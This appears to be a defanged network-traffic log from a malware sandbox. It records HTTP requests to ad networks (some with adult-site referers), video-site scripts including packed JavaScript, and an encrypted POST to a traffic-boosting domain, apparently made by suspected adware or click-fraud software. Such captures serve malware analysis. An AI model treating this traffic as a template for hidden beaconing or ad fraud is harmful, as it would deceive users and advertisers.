HTTP/1.1 200 OK

Server: nginx/1.0.12

Date: Fri, 20 Jan 2017 09:55:11 GMT

Content-Type: image/gif

Content-Length: 0

Last-Modified: Thu, 28 Apr 2016 09:46:38 GMT

Connection: close

Accept-Ranges: bytes

GET /pixel;r=995029119;a=p-pV8razYeGyZwj;fpan=0;fpa=P0-1340228538-1484906118834;ns=1;ce=1;cm=;je=1;sr=1366x768x24;enc=n;dst=1;et=1484906135298;tzo=-120;ref=http://coinsns.com/index.php?s=/lottery/index/index.html;url=http://blockadz.com/ads/show/show.php?a=MNKKAJHPC2F4X&b=8KUVPZMBBAG6V;ogl= HTTP/1.1

Accept: */*

Referer: hXXp://blockadz.com/ads/show/show.php?a=MNKKAJHPC2F4X&b=8KUVPZMBBAG6V

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.87 Safari/537.36 QQBrowser/9.2.5204.400

Host: pixel.quantserve.com

Connection: Keep-Alive

Cookie: mc=5881de87-03611-75ece-ce886


HTTP/1.1 200 OK

Connection: close

Content-Type: image/gif

Cache-Control: private, no-cache, no-store, proxy-revalidate

Pragma: no-cache

Expires: Fri, 04 Aug 1978 12:00:00 GMT

Content-Length: 35

Date: Fri, 20 Jan 2017 09:55:35 GMT

Server: QS

GIF89a.......,.................D..;..

GET /dsp/np?log=4aXECCduGxfW2Kxn3xtmYEaJaUJeklshqNOf3rzI2HvNIbc7LErCtp8riNRcI_he9IK0zj-LilCRyIGNw1kitd8XCIJu4Ib482Juro__479AUxpU8Df2fi-fQzKtSBnuwH-MVzd9FU8gOZlxlgfuwhfXAH7eBcC4JPMuv7GPXIy5H6gl9t1AHhoBDab6lSrK2hGmB9VSACPHoeXmattKj2FxyzAvW-kl6pOZ9FECT3hiXOWmOEGWzBFFP7FEgw2XkdeskaSCWNzoJUvCYRix5cGUhpe-tJkLjG3b6cWv6BLpg0FSYhNA6_xbdlUStbXW_eT7FI2G2829RaOJ4Cg2UNe5vaswjY5D6nGwYjrdWrFbZcKjkLM8sjUk0cn6CyI6rdSkdq2ECosvv9Tk13C4xfcX4ALs1iT1psPlXO0Zun2sMkJbvIKg5Q3SUwTvcH-b&v=404&seq=6 HTTP/1.1

Accept: */*

Referer: hXXp://x.jd.com/exsites?spread_type=2&ad_ids=198:5&location_info=0&callback=getjjsku_callback

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: im-x.jd.com

Connection: Keep-Alive

Cookie: __jda=.238043269.1484906111.1484906111.1484906111.0


HTTP/1.1 200 OK

Server: openresty

Date: Fri, 20 Jan 2017 09:55:13 GMT

Content-Type: image/gif

Transfer-Encoding: chunked

Connection: close

Expires: Fri, 20 Jan 2017 09:55:12 GMT

Cache-Control: no-cache

0..

GET /ads?spot_id=2007013&rand=1853651284&impid=52_1484906106135386_5191&uuid=9382141a-68b6-409b-8dfe-9704cf9ba99c HTTP/1.1

Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml xml, image/pjpeg, application/x-ms-xbap, */*

Referer: hXXp://ads.trafficjunky.net/ads?zone_id=1343921&ref=pornvideo-box.com&pid=1c7fd951-6162-4776-b70b-13bb84f94bba&ts=1484906106

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; chromeframe/22.0.1229.94; .NET CLR 2.0.50727)

Host: ads2.contentabc.com

Connection: Keep-Alive

Cookie: adtools_fc=siteAllocID_266580_expires_1484906106|


HTTP/1.1 200 OK

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Date: Fri, 20 Jan 2017 04:55:06 GMT

Access-Control-Allow-Origin: *

Access-Control-Allow-Methods: GET,POST

Access-Control-Allow-Headers: Content-Type

Access-Control-Max-Age: 86400

Cache-Control: private, no-cache, no-cache, proxy-revalidate

Set-Cookie: adtools_fc=siteAllocID_266580_expires_1484906106|; expires=Sun Feb 19 04:55:06 201

Server: Logger/0.1

Content-Encoding: gzip
2ef.............T[..8.. .T0]i!.s.......vW...=2.!...u....{...a_*...?...
w>...L7.j8j]'.7./..~.qGQ.R.sWE'..-..M....fW....U....`.I.Y...%z....u
...*.52.1..%J....3j$..*:...;......i.H...."....6\..k.3e..7w....y>..u
.....'.....*0).R.K..YMH.Z..........6..Z.j.0V..`<....&...|..r...q...
..*_..e.mu..o.~.l.n.......(...22.d.H..4 )).....l4.O.`.`.,..\<,....a
....."`.f.$ ......./..J.g.~........NB..H.rN...w. .f.._.r.4..$.......[}
........H...........R......>.....^.i.c..|W.@{.l*:...I..e.J..O.....1
...]5.....jHA...\G.&..`.-Q.$.e.Z... .....^8.U.,...3_..d{.R..r...>s.
..R.V0..M.......^....N....(.......H....9.@...Po.*...A...Y.......w..ULY
..c...@..@d|2RS..>..Q..V..o.....j...1..I.%.J.....n..V...p..7..!z...
.I..P......c.0.6>.. ...l..,B~0..".@hu..Q...*..~p........0..)..h~..1
............0..

GET /static/golden/style.3.2.0.css HTTP/1.1

Accept: */*

Referer: hXXp://coinsns.com/index.php?s=/lottery/index/index.html

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.87 Safari/537.36 QQBrowser/9.2.5204.400

Host: static.geetest.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Jan 2017 09:55:20 GMT

Content-Type: text/css

Content-Length: 23425

Connection: close

Cache-Control: max-age=86400

ETag: 89eb697a7140557b12bc81fd37af815a

Expires: Sat, 21 Jan 2017 09:37:33 GMT

Access-Control-Allow-Origin: *

Accept-Ranges: bytes

X-Varnish: 2921431274 2921388646

Age: 1067

Via: 1.1 varnish

X-Cache: HIT

.gt_holder.gt_popup .gt_popup_wrap,.gt_holder.gt_popup .gt_popup_cross
,.gt_holder .gt_holder_top,.gt_holder .gt_box_tips,.gt_holder.gt_en .g
t_box_tips,.gt_holder .gt_curtain_button,.gt_holder .gt_curtain_button
.gt_moving,.gt_holder .gt_curtain_button.gt_success,.gt_holder .gt_cur
tain_button.gt_fail,.gt_holder .gt_flash,.gt_holder .gt_ie_success,.gt
_holder .gt_loading .gt_loading_icon,.gt_holder.gt_en .gt_loading,.gt_
holder .gt_info,.gt_holder .gt_info .gt_success .gt_info_icon,.gt_hold
er .gt_info .gt_fail .gt_info_icon,.gt_holder .gt_info .gt_abuse .gt_i
nfo_icon,.gt_holder .gt_info .gt_forbidden .gt_info_icon,.gt_holder .g
t_info .gt_error .gt_info_icon,.gt_holder .gt_bottom,.gt_holder.gt_en 
.gt_bottom,.gt_holder .gt_refresh_button,.gt_holder .gt_refresh_button
:hover,.gt_holder .gt_refresh_button .gt_refresh_tips,.gt_holder .gt_h
elp_button,.gt_holder .gt_help_button:hover,.gt_holder .gt_help_button
 .gt_help_tips,.gt_holder .gt_ajax_tip,.gt_holder .gt_ajax_tip.gt_succ
ess,.gt_holder .gt_ajax_tip.gt_lock,.gt_holder .gt_ajax_tip.gt_ready,.
gt_holder .gt_ajax_tip.gt_fail,.gt_holder .gt_ajax_tip.gt_forbidden,.g
t_holder .gt_ajax_tip.gt_error,.gt_holder .gt_slider,.gt_holder .gt_sl
ider_knob,.gt_holder .gt_slider_knob.gt_moving,.gt_holder .gt_curtain_
knob{background-repeat:no-repeat;background-image:url('hXXp://static.g
eetest.com/static/golden/sprite.3.2.0.png');_background-image:url('htt
p://static.geetest.com/static/golden/sprite.3.2.0.gif')}@media (-webki
t-min-device-pixel-ratio: 1.5), (min-device-pixel-ratio: 1.5), (mi

<<< skipped >>>

GET /ads?zone_id=1319961&ref=pornvideo-box.com&pid=1c7fd951-6162-4776-b70b-13bb84f94bba&ts=1484906106 HTTP/1.1

Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml xml, image/pjpeg, application/x-ms-xbap, */*

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; chromeframe/22.0.1229.94; .NET CLR 2.0.50727)

Host: ads.trafficjunky.net

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Fri, 20 Jan 2017 09:55:05 GMT

Content-Type: text/html

Content-Length: 1691

Connection: close

Cache-Control: private, no-cache, no-cache, proxy-revalidate

Server: Logger/0.1

Set-Cookie: tj_UUID=ed52589f-2015-4c94-939d-10ca076c51c4; domain=.trafficjunky.net; path=/; Expires=Mon Jan 15 04:55:05 2018

Access-Control-Allow-Origin: *

Access-Control-Allow-Credentials: true

Access-Control-Allow-Methods: GET,POST

Access-Control-Allow-Headers: Content-Type

Access-Control-Max-Age: 86400
<HTML><HEAD><script type="text/javascript"> var MAXI
MUM_DEPTH = 10;function mouseover(self){for(var i = 0; i < MAXIMUM_
DEPTH; i  ){var parent = getParent(window.parent, i);parent.postMessag
e({event: "mouseover", click_url:self.attributes.click_url.value}, "*"
);}}function mouseout(self){for(var i = 0; i < MAXIMUM_DEPTH; i  ){
var parent = getParent(window.parent, i);parent.postMessage({event:"mo
useout"}, "*");}}function getParent(e, i){if( i == 0){return e;}return
 getParent(e.parent, i - 1);}</script><TITLE>Ad delivery s
ystem</TITLE><meta name="keywords" content="1000232241" def="
1" z_id="1319961" ad_id="1189078351" qw="0" isave="yes" /> <meta
 name="description" content="" /> <style type="text/css"><
!-- a img   { border: 0; } body    { margin: 0; padding: 0; text-align
: center;} --> </style> </HEAD><BODY style="backgrou
nd-color:transparent;"><iframe onmouseover="mouseover(this);" on
mouseout="mouseout(this)" id="1319961_1484906105" name="1319961_148490
6105" src="hXXp://ads2.contentabc.com/ads?spot_id=2007013&rand=1853651
284&impid=50_1484906105921674_21386&uuid=ed52589f-2015-4c94-939d-10ca0
76c51c4" width="300" height="250" scrolling="no" frameborder="0" allow
transparency="true" marginwidth="0" marginheight="0" z_id="1319961" c_
id="1000232241"  ad_id="1189078351" def="1" qw="0" click_url="hXXp://a
ds.trafficjunky.net/click?url=iframe-click&click_data=QAAAAOQlAAB5
3oFYAAAAAAAAAAAZJBQAGSQUAAAAAAAxVZ47T-XfRs1OijwAAAAAAAAAAAABAAAAAA<<< skipped >>>

GET /vodpb.gif?url=hXXp://VVV.iqiyi.com/common/flashplayer/20170118/10382a1b82aa.swf&tag=done&curl=hXXp://VVV.iqiyi.com/common/flashplayer/20170118/10382a1b82aa.swf&useTime=1154&dur=5644 HTTP/1.1

Accept: */*

Accept-Language: en-US

x-flash-version: 23,0,0,185

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: msg.video.qiyi.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.8.0

Date: Fri, 20 Jan 2017 09:55:15 GMT

Content-Type: image/gif

Content-Length: 0

Connection: keep-alive

HTTP/1.1 200 OK..Server: nginx/1.8.0..Date: Fri, 20 Jan 2017 09:55:15 
GMT..Content-Type: image/gif..Content-Length: 0..Connection: keep-aliv
e..

GET /pagead/js/adsbygoogle.js HTTP/1.1

Accept: */*

Referer: hXXp://coinsns.com/index.php?s=/lottery/index/index.html

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.87 Safari/537.36 QQBrowser/9.2.5204.400

Host: pagead2.googlesyndication.com

Connection: Keep-Alive


HTTP/1.1 200 OK

P3P: policyref="hXXp://VVV.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"

Timing-Allow-Origin: *

Content-Type: text/javascript; charset=UTF-8

ETag: 1662086586813402118

Date: Fri, 20 Jan 2017 08:55:28 GMT

Expires: Fri, 20 Jan 2017 09:55:28 GMT

X-Content-Type-Options: nosniff

Content-Disposition: attachment; filename="f.txt"

Content-Encoding: gzip

Server: cafe

Content-Length: 19112

X-XSS-Protection: 1; mode=block

Age: 3587

Cache-Control: public, max-age=3600
............gw.8.(...B..u..,KrIL..q.....F...$(..JD.....g....$.........
.i....8..'c................R|>...IT..0....&.....@.....p...8.lG...qf
r~1.[...W...*..j....\.6...|.m6....l8.7.....u..zP.:......$0.....Qw(...5
...r..3.F,...`c....2..eh.g..4..rU*tt*g......X...C.....R.Y.....}......Y
.....aUY...[..'..c....[.(.k..@...^.byQ.b/._......,X.Kh,.O....s.3......
.......kCL...-.>....>L.x.8.&.K.$..g>.M.jOf...&.l...4T....@0..
....iS...3C....Qy. ...'.a4.C.X.6 t..f.Xnu).ZnF.l.4#Sn.7.>N...fk}Ub.
.m..Ay...k,..KY.&!..N(\i..6...E....B.......Y.y.J.....E2Hg#7..."....E.?
.s..O......>.W5L_..R.M..@.E........*J.YF.<..4.....E0.........X..
.........Z.a..=........ 7.=..ue/..YO.A.l5......_p.L...........n..@...%
.i<.s<.t....x...........4]@..._J.2CQZ.].....Vs.......T...a.....\
&.fg..n.........8.\........^.{..K}..........~..t.m..........H...}...#.
...C.4.#....Z...6[......M....f.i9l..[..a.v!0Sev..Z...D....]L..P......|
...b..\k..5..1.X.Q>...0.q....87'..2k7[......`O.?..i.-...~...l).....
.....B%.zBZS5{..I@.... "H(..k.%G..........Slg.V&..4......~O._.f.~.~...
3.......xB......%<D."......A0cZy%..!FS...r.....1w<..|....f.We.o.
/g~...\L*...T.;......r...x/.xO............S..~........[........_@.[X-|
....~o..Z.{[l.....Q.........O.?#...sL.c.....?..9....#../.Ir...n......?
......v..........E..... ..N.m...*J..Oe.d..}.....=...?:.2.....@b......Q
8..X:...y".A.LD...Ol...#.Pvl.R..) ...H.."..6..W..7.. ."8.".Kj@#.....n.
c.......~$.K=.SP....yu...t.....8.0.>.......e....h"..>.&.t :..\.r
..j....K.y.K!`O.D8.#..1.....r....4..M..D."...>...o......?......<<< skipped >>>

GET /pagead/js/r20170116/r20170110/show_ads_impl.js HTTP/1.1

Accept: */*

Referer: hXXp://coinsns.com/index.php?s=/lottery/index/index.html

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.87 Safari/537.36 QQBrowser/9.2.5204.400

Host: pagead2.googlesyndication.com

Connection: Keep-Alive


HTTP/1.1 200 OK

P3P: policyref="hXXp://VVV.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"

Timing-Allow-Origin: *

Content-Type: text/javascript; charset=UTF-8

ETag: 10624018096874117778

Date: Fri, 20 Jan 2017 09:55:17 GMT

Expires: Fri, 20 Jan 2017 09:55:17 GMT

Cache-Control: private, max-age=1209600

X-Content-Type-Options: nosniff

Content-Disposition: attachment; filename="f.txt"

Content-Encoding: gzip

Server: cafe

Content-Length: 66804

X-XSS-Protection: 1; mode=block
............i[.H.0.._.u.a..1.!$.P..!.I.F.I.'.v.Wd.%......E-Ydr..9se.z.
.......x>.f.xdZwW^.~.f..<.2.sU.g.e.l.....i......d....,..<.kL'
.tf...r.7X,f..m...:|..Ft...A.Nf...2.l..cf..........h...76..k?O..iY.U.S
|...N..{.oC..A!....K.k}...,).......$.......1./.`f..oA.....t4.y....g.wk
.y1<..N9.{.DdZ..l'pylc..gcl.1....t.4.o0....]...o.(._..'.lM.....C...
c4..Q..9$5U.|.Fq:.B.........Zu2.t.e.......e.?................./;\.,..}
=./..U...Ko,..4Z...9.q(...2...z..{X^...K6..Ab2\7. r.......R...).J..}..
d.U.O....K..*..v-..V!.}..h......Dc.)....L..%.XE-bZ..7..dpkz..6....Vz4.
B...¡k.5;....GY...6X{O....{......9Ep.{S.am.@.%...Qy.)........,T.x".G
.\....M..%;X...Wn?.y.....V.].'U.).j@0.y..d....h=....;..=...~ ...\X..B.
..Yc..f.w.^...oL.....(O(?.p......E...z.X...(.^..%{^.....x..y.]?..C.._.
.3b......p.d.`6.\.R.To5`1. .H>of..7.......@....V..6.=W.u...&1W..n..
[..q.....4..;..i.b0.f9.ZO...w.^,Z{......o....q....4....n.x.eX..Z......
\[...F....h.mvjM{......G.l.D..n.cv..7{..........2..ns.i.nu.l.iu[.^.D.h
...s3.,.....C.4.3.=2.f..2X.bs...k.nS.F.y..s..i../..........~.W........
./Dp.I....7.................s...G.........?...........&3S.o.....X...'=
.a.........<...... ..B....~a.........&......2.v....j....>l.._...
VkY.r%&[.....Wb.|w.dHm..k.....Q7.Uts}J.h$.q2..p.H..x..Z.....E3......x.
.l7x...Q....V.x....*....KI......p.q@...t..>...b.@d......z......9...
.'..H..Ed.8.....b6..&.....,=.3..S.. Ni.5K..y.3..r.5...y..5....xH....9g
R.|Q...d..S5..bZK.21.&....?............V..\.......%..... }.....a.....V
^.........r.....0.`V...J.c..Te......5f... ..k..7..?.O.r...2-.xK...<<< skipped >>>

GET /pagead/js/adsbygoogle.js HTTP/1.1

Accept: */*

Referer: hXXp://coinsns.com/index.php?s=/lottery/index/index.html

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.87 Safari/537.36 QQBrowser/9.2.5204.400

Host: pagead2.googlesyndication.com

If-None-Match: 1662086586813402118

Connection: Keep-Alive


HTTP/1.1 304 Not Modified

Date: Fri, 20 Jan 2017 09:54:26 GMT

Expires: Fri, 20 Jan 2017 10:54:26 GMT

Age: 67

ETag: 1662086586813402118

HTTP/1.1 304 Not Modified..Date: Fri, 20 Jan 2017 09:54:26 GMT..Expire
s: Fri, 20 Jan 2017 10:54:26 GMT..Age: 67..ETag: 1662086586813402118..

POST /ts/f3.1/ HTTP/1.1

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

User-Agent: llb/1.1.73.813

Host: ap3.liuliangbao.cn

Content-Length: 564

Connection: Keep-Alive

Cache-Control: no-cache

d=993ec52ee1bd12d7939e6ceb7e2b7f0d3e041e8eaf8e107980a9adb5e7502623e094eae1bd1359f23367419014e4ad5fd52776d5e952273cbd22b0aef3e96ccbdcd4ce02f902d84eb32de8fe33128ebcf57a5e2b56c3f0cdbe1b75c1b7d8094d1e6273ec79f6669a53430b58c64ddb8d20b74fc6360f96377731b30b209afbe6c921912b530d8fe34c71afc973f03266b63fbbabf216adfd5420efab4c277136b0af900c3bf60a5ea020e09df2c579ad15bd2d8469eedfc36aa5d3403051408da0ddd41cff0d7639230e884d2bbd5b7d31c5033ea121ece9ee23f40aa3457a696be1c1f79747f46590b416b5212597f430c44c7b6b3db4f74f488f964ca1db5f4ddfb9f4cfc1182ec0b3995f981263dc32af70aaa8231f958a
HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Jan 2017 09:55:05 GMT

Content-Type: text/html;charset=UTF-8

Transfer-Encoding: chunked

Connection: keep-alive

Content-Encoding: gzip

17............340...Pw#......0..HTTP/1.1 200 OK..Server: nginx..Date: 
Fri, 20 Jan 2017 09:55:05 GMT..Content-Type: text/html;charset=UTF-8..
Transfer-Encoding: chunked..Connection: keep-alive..Content-Encoding: 
gzip..17............340...Pw#......0..

GET /dsp/np?log=4aXECCduGxfW2Kxn3xtmYEaJaUJeklshqNOf3rzI2HvNIbc7LErCtp8riNRcI_heEnmDgzEgJtbifhOVPNJDZL6mH1RGK8un5EUb_9dOg2LZm5QrA9b6KN-vXxSfzlPcMjoWBWB2Qi4sH93q7P68fKkAAFjL92af8brD9oOnSmt21L8iRmx_VVVc5QzQnuJiLqMVVudbR0NjyzLkTwqwEXN4scuxPw9hAirzu5jtOf4jwortaew7ipPMC0QuHuM33WD46Le0Ah331azG5hFqVzyu30AH1QsCnIPhwy44crCrLdRkmS6JAgqn-ZsgEAAXZsn4spVbueuUvN5eqLh_fEhs6XE-Aj-rUVIQhXt8o8OCExHVX9CCAPXguqrBMbysrUEQySUQPfJa6J5KiRS7hgjReGDX_6K_HenD3hEg7_xIRqfNClH-V7eA5dXazejC&v=404&seq=3 HTTP/1.1

Accept: */*

Referer: hXXp://x.jd.com/exsites?spread_type=2&ad_ids=198:5&location_info=0&callback=getjjsku_callback

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: im-x.jd.com

Connection: Keep-Alive

Cookie: __jda=.238043269.1484906111.1484906111.1484906111.0


HTTP/1.1 200 OK

Server: openresty

Date: Fri, 20 Jan 2017 09:55:12 GMT

Content-Type: image/gif

Transfer-Encoding: chunked

Connection: close

Expires: Fri, 20 Jan 2017 09:55:11 GMT

Cache-Control: no-cache

0..

GET /js/player_v1/config/online.js HTTP/1.1

Accept: */*

Referer: hXXp://VVV.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: static.iqiyi.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Type: text/javascript

Accept-Ranges: bytes

ETag: "54051341"

Last-Modified: Thu, 19 Jan 2017 10:14:09 GMT

Content-Length: 2011

Server: Apache 1.3.29

Cache-Control: max-age=300

Expires: Fri, 20 Jan 2017 10:00:07 GMT

Date: Fri, 20 Jan 2017 09:55:07 GMT

Connection: keep-alive
!function(i){var w={FLASH_PLAYER_URL:"hXXp://VVV.iqiyi.com/common/flas
hplayer/20170119/1050f98c2359.swf",FLASH_VR_URL:"hXXp://VVV.iqiyi.com/
common/flashplayer/20170116/14455b45a8bb.swf",FLASH_AD_URL:"",FLASH_P2
P_URL:"hXXp://VVV.iqiyi.com/common/flashplayer/20170118/10382a1b82aa.s
wf",FLASH_BARRAGE_URL:"hXXp://VVV.iqiyi.com/common/flashplayer/2017011
9/1050c72eeb6.swf",FLASH_PRELOADER_URL:"hXXp://VVV.iqiyi.com/common/fl
ashplayer/20161122/18235aa9a57.swf",FLASH_PRELOADER_URL_TW:"hXXp://www
.iqiyi.com/common/flashplayer/20161215/1156c9cdf8a4.swf",FLASH_PRELOAD
ER_VIP:"hXXp://VVV.iqiyi.com/common/flashplayer/20161122/182384b0df09.
swf",FLASH_PRELOADER_VIP_TW:"hXXp://VVV.iqiyi.com/common/flashplayer/2
0161122/1823df83b9a5.swf",FLASH_PRELOADER_PRODUCE:"hXXp://VVV.iqiyi.co
m/common/flashplayer/20161122/1823561520f8.swf",FLASH_PRELOADER_PRODUC
E_TW:"hXXp://VVV.iqiyi.com/common/flashplayer/20161122/18235e1d0a85.sw
f",FLASH_PRELOADER_EXCLUSIVE:"hXXp://VVV.iqiyi.com/common/flashplayer/
20161122/182321793893.swf",FLASH_PRELOADER_EXCLUSIVE_TW:"hXXp://VVV.iq
iyi.com/common/flashplayer/20161122/1823dc809b19.swf",FLASH_PRELOADER_
ICON:"hXXp://VVV.iqiyi.com/common/flashplayer/20161122/1823c314a0aa.sw
f",FLASH_PRELOADER_ICON_TW:"hXXp://VVV.iqiyi.com/common/flashplayer/20
161122/18237da15813.swf",FLASH_PRELOADER_ICON_PRODUCE:"hXXp://VVV.iqiy
i.com/common/flashplayer/20161122/1823925a82d4.swf",FLASH_PRELOADER_IC
ON_PRODUCE_TW:"hXXp://VVV.iqiyi.com/common/flashplayer/20161122/182315
1837af.swf",FLASH_PRELOADER_ICON_EXCLUSIVE:"hXXp://VVV.iqiyi.com/c<<< skipped >>>

GET /js/lib/sea1.2.js HTTP/1.1

Accept: */*

Referer: hXXp://VVV.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: static.iqiyi.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Type: text/javascript

Accept-Ranges: bytes

ETag: "4014690817"

Last-Modified: Thu, 19 Jan 2017 10:14:12 GMT

Content-Length: 265751

Server: Apache 1.3.29

Cache-Control: max-age=300

Expires: Fri, 20 Jan 2017 10:00:07 GMT

Date: Fri, 20 Jan 2017 09:55:07 GMT

Connection: keep-alive
window.seajs||(!function(a,b){function c(a){return function(b){return{
}.toString.call(b)=="[object " a "]"}}function d(){return C  }function
 e(a){return a.match(F)[0]}function f(a){for(a=a.replace(G,"/");a.matc
h(H);)a=a.replace(H,"/");return a=a.replace(I,"$1/")}function g(a){var
 b=a.length-1,c=a.charAt(b);return"#"===c?a.substring(0,b):".js"===a.s
ubstring(b-2)||a.indexOf("?")>0||".css"===a.substring(b-3)||"/"===c
?a:a ".js"}function h(a){var b=x.alias;return b&&z(b[a])?b[a]:a}functi
on i(a){var b,c=x.paths;return c&&(b=a.match(J))&&z(c[b[1]])&&(a=c[b[1
]] b[2]),a}function j(a){var b=x.vars;return b&&a.indexOf("{")>-1&&
(a=a.replace(K,function(a,c){return z(b[c])?b[c]:a})),a}function k(a){
var b=x.map,c=a;if(b)for(var d=0,e=b.length;e>d;d  ){var f=b[d];if(
c=B(f)?f(a)||a:a.replace(f[0],f[1]),c!==a)break}return c}function l(a,
b){var c,d=a.charAt(0);if(L.test(a))c=a;else if("."===d)c=f((b?e(b):x.
cwd) a);else if("/"===d){var g=x.cwd.match(M);c=g?g[0] a.substring(1):
a}else c=x.base a;return 0===c.indexOf("//")&&(c=location.protocol c),
c}function m(a,b){if(!a)return"";a=h(a),a=i(a),a=j(a),a=g(a);var c=l(a
,b);return c=k(c)}function n(a){return a.hasAttribute?a.src:a.getAttri
bute("src",4)}function o(a,b,c){var d=W.test(a),e=N.createElement(d?"l
ink":"script");if(c){var f=B(c)?c(a):c;f&&(e.charset=f)}p(e,b,d,a),d?(
e.rel="stylesheet",e.href=a):(e.async=!0,e.src=a),S=e,V?U.insertBefore
(e,V):U.appendChild(e),S=null}function p(a,b,c,d){function e(){a.onloa
d=a.onerror=a.onreadystatechange=null,c||x.debug||U.removeChild(a)<<< skipped >>>

GET /js/common/52ba69c7b1d54420bec46c52cec587c6.js HTTP/1.1

Accept: */*

Referer: hXXp://VVV.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: static.iqiyi.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Type: text/javascript

Accept-Ranges: bytes

ETag: "729538241"

Last-Modified: Wed, 11 Jan 2017 06:54:31 GMT

Content-Length: 146667

Server: Apache 1.3.29

Cache-Control: max-age=300

Expires: Fri, 20 Jan 2017 10:00:07 GMT

Date: Fri, 20 Jan 2017 09:55:07 GMT

Connection: keep-alive
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c
/a))) ((c=c%a)>35?String.fromCharCode(c 29):c.toString(36))};if(!''
.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){ret
urn d[e]}];e=function(){return'\\w '};c=1};while(c--){if(k[c]){p=p.rep
lace(new RegExp('\\b' e(c) '\\b','g'),k[c])}}return p}('2g 2V=(2n(){2g
 M=cu,N=0,O=0,P=cv,R=2r ct(cs),T=2r 9d(R),U=2r 9j(R),V=2r 3p(R);U[0]=a
k;2g S=2r 3p(cp);2g 8Y=[7,12,17,22,5,9,14,20,4,11,16,23,6,10,15,21,5];
2M(2g i=8,j=0;i<73;i =4,j  ){S[i]=8Y[j]}2M(2g i=cq,j=48;i<=cr;i 
 ,j  )S[i]=j;2M(2g i=cw,j=97;i<=3n;i  ,j  )S[i]=j;V.8D(S,8);2n W(2s
,s){2g 2m=2s=3r.cx(2s/(s?s:16))*(s?s:16);2j 2m}N=W(M);O=W(P);2n 2F(2s)
{2g 2m=O;O=O 2s|0;O=O 15&-16;2j 2m}2n 1w(2s){2g 2m=M;M=M 2s|0;M=M 15&-
16;2j 2m}2n 95(2s){2g 2m=N;N=N 2s|0;N=N 15&-16;2j 2m}2n 7V(8y){2g 94=7
V;1J(!94.cD){1J(O%3i>0){O=O 3i-O%3i}}2g 2m=O;1J(8y!=0){2g 96=2F(8y)
;1J(!96)2j-1>>>0}2j 2m}2n X(2y,3u,3x,p){2g z,2s;1J(3d 2y===\'
cy\'){z=cz;2s=2y}1L{z=co;2s=2y.2L}2g 8E=3d 3u===\'cn\'?3u:cc;2g 2m;1J(
3x==4){2m=p}1L{2m=[3d 7O===\'2n\'?7O:1w,95,1w,2F][3x===al?2:3x](3r.c8(
2s,8E?1:3u.2L))}1J(z){2g p=2m,s;1J((2m&3)!=0)2j 2m;s=2m (2s&~3);2M(;p&
lt;s;p =4){U[p>>2]=0}s=2m 2s;2i(p<s){T[p  >>0]=0}2j 2m}
1J(8E===\'a7\'){1J(2y.93||2y.c7){V.8D(2y,2m)}1L{V.8D(2r 3p(2y),2m)}2j 
2m}}2n 2R(2E){2D=V;2g 2p,2C,2K,2N,3H,84,2t=\'\';2i(1){2p=2D[2E  ];1J(!
